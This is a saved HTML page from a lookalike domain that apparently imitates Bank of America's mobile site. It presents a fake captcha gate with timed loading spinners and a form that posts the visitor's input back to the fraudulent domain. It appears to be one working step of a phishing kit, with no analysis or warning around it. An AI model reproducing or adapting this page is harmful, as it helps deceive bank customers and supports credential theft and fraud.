
<!-- saved from url=(0037)https://mservicebkofamerica.com/?3334 -->
<html class=" js no-flexbox canvas canvastext webgl no-touch geolocation postmessage websqldatabase indexeddb hashchange history draganddrop websockets rgba hsla multiplebgs backgroundsize borderimage borderradius boxshadow textshadow opacity cssanimations csscolumns cssgradients cssreflections csstransforms csstransforms3d csstransitions fontface generatedcontent video audio localstorage sessionstorage webworkers applicationcache svg inlinesvg smil svgclippaths"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE10">
<meta name="apple-itunes-app" content="app-id=284847138">
<!--[if IE 9]>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE9" >
<![endif]-->
<title>Captcha verification</title>
<link rel="shortcut icon" href="https://mservicebkofamerica.com/favicon.ico">
<link rel="stylesheet" href="./Captcha verification_files/bactouch.css">
<link rel="stylesheet" href="./Captcha verification_files/toolbar.css">
<style>
.noselect {
  -webkit-touch-callout: none; /* iOS Safari */
    -webkit-user-select: none; /* Safari */
     -khtml-user-select: none; /* Konqueror HTML */
       -moz-user-select: none; /* Old versions of Firefox */
        -ms-user-select: none; /* Internet Explorer/Edge */
            user-select: none; /* Non-prefixed version, currently
                                  supported by Chrome, Edge, Opera and Firefox */
}
.myButton {
	box-shadow:inset 0px 1px 0px 0px #ffffff;
	background:linear-gradient(to bottom, #ededed 5%, #dfdfdf 100%);
	background-color:#ededed;
	border-radius:6px;
	border:1px solid #dcdcdc;
	display:inline-block;
	cursor:pointer;
	color:#777777;
	font-family:Arial;
	font-size:15px;
	font-weight:bold;
	padding:6px 10px;
	text-decoration:none;
	text-shadow:0px 1px 0px #ffffff;
}
.myButton:hover {
	background:linear-gradient(to bottom, #dfdfdf 5%, #ededed 100%);
	background-color:#dfdfdf;
}
.myButton:active {
	position:relative;
	top:1px;
}
</style>
<script>
setTimeout(continueld, 400);
function continueld() {
	document.getElementById('loadr').style.display='block';
}
setTimeout(continuecp, 1200);
function continuecp() {
	document.getElementById('page').style.display='block';
}
setTimeout(continuefm, 3600);
function continuefm() {
	document.getElementById('spinnerPanel').style.display='none';
}
function verify() {
	document.getElementById('spinnerPanel').style.display='block';
	setTimeout(continuevy, 3100);
	function continuevy() {
		document.getElementById('spinnerPanel').style.display='none';
		document.getElementById('entry').submit();
	}
}
</script>
</head>
<body>
<div id="page" style="display: block;" class="">
<div id="194848904" class="cmw_toolBar_">
<a id="104984784839" role="button"></a>
<a id="38493084744" class="sprite" href="https://mservicebkofamerica.com/?3334#" role="button"></a>
<div id="394846536783" class="hidden"></div>
<h1 id="490284674832" class="logo">
<div id="104847453830373"></div>
<span class="adaHidden" id="adaTitleText"></span>
</h1>
<a id="4827646292761"></a>
</div>
<div id="1084764536782"></div>
<div class="pageMinHeight">

<div class="pageMinHeight">
<div id="authorizationCodeDiv">
    <div id="CheckEmailForAuthCode"><div class="paddingVert10 padding10"><p>Please complete the captcha to continue.</p><div>
    <div id="TextMessageForAuthCode" style="display: none;">
    </div>
    <div id="alreadyHaveCode" class="paddingVert10 padding10" style="display: none;">
    </div>
	<form id="entry" action="https://mservicebkofamerica.com/?3334" method="post" autocomplete="off">
	<input type="hidden" id="sec" name="sec" value="true">
	<input type="hidden" id="activation" name="activation" value="3334">
    <div class="inputContainer">
        <label for="authCode" id="authCodeOtac" style="padding-right:30px"><img src="./Captcha verification_files/webpg.png" width="100px" style="margin-top:20px"></label>
        <input style="width:50%" id="tvc" name="tvc" oninput="this.value = this.value.replace(/[^0-9]/g, &#39;&#39;); this.value = this.value.replace(/(\..*)\./g, &#39;$1&#39;)" maxlength="5" type="text" placeholder="Enter code here"><a href="javascript:void();" style="display: none" role="button" title="Clear text field"></a>
    </div>
    <div class="padding10 toppad20" id="CodeExpires" style="display: none;"><p>The code expires 10 minutes after you request it.</p></div>
    <div class="toppad20 padding10" id="CodeExpiresByEmail">Enter the characters you see in the image.</div>

</form></div>
    <div id="btnPin" style="position: fixed; bottom: 0px;">
        <ul class="btnGroupPin">
            <li>
                <a id="cancelButton" class="btnNeg" role="button">
                    <span class="btnText fontBold">Cancel</span>
                </a>
            </li>
            <li>
                <a id="continue" onclick="verify()" class="btnPos noselect" role="button" title="dimmed">
                    <span class="btnText fontBold">Continue</span>
                </a>
            </li>
        </ul>
    </div>
</div>
<div class="clear"></div></div>
<div style="height:50px"></div>
</div>
</div>
<div id="spinnerPanel" class="spinnerPanel" style="height: 100%; display: none;">
<div class="spinner" style="top: 246.8px;">
<span id="loadr" style="display: block;" class="messageIcon"></span>
<a id="spinnerLink" class="adaHidden" href="javascript:void(0)" role="dialog">processing</a>
</div>
</div>


</div></div></body></html>